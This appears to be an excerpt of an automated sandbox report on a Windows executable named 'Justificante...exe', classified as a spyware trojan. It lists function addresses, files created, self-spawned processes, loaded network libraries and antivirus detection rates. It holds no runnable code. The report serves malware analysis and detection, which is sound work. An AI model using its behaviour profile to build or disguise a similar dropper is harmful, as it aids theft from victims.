            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610FAB04_2_3610FAB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610B7B34_2_3610B7B3
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361056B84_2_361056B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36108CB84_2_36108CB8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E2B84_2_3610E2B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361074BF4_2_361074BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101BA04_2_36101BA0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A4A04_2_3610A4A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CFA64_2_3610CFA6
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36102DA84_2_36102DA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CFA84_2_3610CFA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361056A84_2_361056A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36108CA94_2_36108CA9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610FAAB4_2_3610FAAB
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361004D04_2_361004D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361074D04_2_361074D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CAD14_2_3610CAD1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105FD84_2_36105FD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36109FD84_2_36109FD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103FD84_2_36103FD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610B7C04_2_3610B7C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361004C04_2_361004C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105FC74_2_36105FC7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E2C84_2_3610E2C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36109FC84_2_36109FC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36100DF04_2_36100DF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361087F04_2_361087F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610DDF04_2_3610DDF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361048F74_2_361048F7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101FF84_2_36101FF8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610B2F84_2_3610B2F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36106FFB4_2_36106FFB
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361016FF4_2_361016FF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36109AFF4_2_36109AFF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CAE04_2_3610CAE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36100DE04_2_36100DE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361087E04_2_361087E0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F5E14_2_3610F5E1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103FE84_2_36103FE8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F5E84_2_3610F5E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101FE84_2_36101FE8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610B2E84_2_3610B2E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3613DA304_2_3613DA30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361373E04_2_361373E0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36135E004_2_36135E00
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36132C004_2_36132C00
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361348204_2_36134820
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361316204_2_36131620
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361364404_2_36136440
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361332404_2_36133240
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361300404_2_36130040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36134E604_2_36134E60
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36131C604_2_36131C60
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36136A804_2_36136A80
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361338804_2_36133880
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361306804_2_36130680
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361354A04_2_361354A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361322A04_2_361322A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361370C04_2_361370C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36133EC04_2_36133EC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36130CC04_2_36130CC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361312FB4_2_361312FB
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36135AE04_2_36135AE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361328E04_2_361328E0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36139CE84_2_36139CE8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361345004_2_36134500
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361313004_2_36131300
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361361204_2_36136120
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36132F204_2_36132F20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3613035B4_2_3613035B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36134B404_2_36134B40
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361319404_2_36131940
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361335604_2_36133560
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361303604_2_36130360
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361367604_2_36136760
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3613F1684_2_3613F168
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361351804_2_36135180
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36131F804_2_36131F80
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36133BA04_2_36133BA0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361309A04_2_361309A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36136DA04_2_36136DA0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361357C04_2_361357C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361325C04_2_361325C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361341E04_2_361341E0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36130FE04_2_36130FE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361484704_2_36148470
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614A0904_2_3614A090
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36141CF04_2_36141CF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614FB304_2_3614FB30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361494104_2_36149410
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614F8104_2_3614F810
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614C6104_2_3614C610
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361400064_2_36140006
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614B0304_2_3614B030
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614E2304_2_3614E230
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361418214_2_36141821
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361418284_2_36141828
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36149A504_2_36149A50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614CC504_2_3614CC50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361400404_2_36140040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614E8704_2_3614E870
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614B6704_2_3614B670
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614E8614_2_3614E861
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614D2904_2_3614D290
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36140E934_2_36140E93
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36140E984_2_36140E98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614BCB04_2_3614BCB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36148AB04_2_36148AB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614EEB04_2_3614EEB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614D8D04_2_3614D8D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614A6D04_2_3614A6D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614F4F04_2_3614F4F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361490F04_2_361490F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614C2F04_2_3614C2F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361404FF4_2_361404FF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36141CE04_2_36141CE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614AD104_2_3614AD10
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614DF104_2_3614DF10
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361405084_2_36140508
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361497304_2_36149730
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614C9304_2_3614C930
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614E5504_2_3614E550
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614B3504_2_3614B350
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361413594_2_36141359
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36149D704_2_36149D70
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614CF704_2_3614CF70
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361413604_2_36141360
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614B9904_2_3614B990
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361487904_2_36148790
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614EB904_2_3614EB90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614A3B04_2_3614A3B0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614D5B04_2_3614D5B0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614F1D04_2_3614F1D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361409D04_2_361409D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36148DD04_2_36148DD0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614BFD04_2_3614BFD0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361409CD4_2_361409CD
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614DBF04_2_3614DBF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3614A9F04_2_3614A9F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361435E94_2_361435E9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361616D84_2_361616D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361632B04_2_361632B0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36161DF84_2_36161DF8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361639984_2_36163998
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361624E04_2_361624E0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361642634_2_36164263
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36160FF04_2_36160FF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36162BC84_2_36162BC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361616CE4_2_361616CE
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361632A04_2_361632A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36161DE84_2_36161DE8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361639894_2_36163989
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361624D04_2_361624D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361601D84_2_361601D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361601E84_2_361601E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36160FE04_2_36160FE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36160C324_2_36160C32
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36160C784_2_36160C78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36162BB94_2_36162BB9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36160BFD4_2_36160BFD
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_367FB9114_2_367FB911
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_367F1B4C4_2_367F1B4C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_367F49584_2_367F4958
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: String function: 00402BCE appears 50 times
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: invalid certificate
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954495330.0000000032C67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Justificante67ab404ffe31b359e00a499e656454545.exe
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile created: C:\Program Files (x86)\HypotesersJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\doggingJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile created: C:\Users\user\AppData\Local\Temp\nsn1557.tmpJump to behavior
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeVirustotal: Detection: 29%
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeReversingLabs: Detection: 62%
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile read: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeSection loaded: mskeyprotect.dllJump to behavior
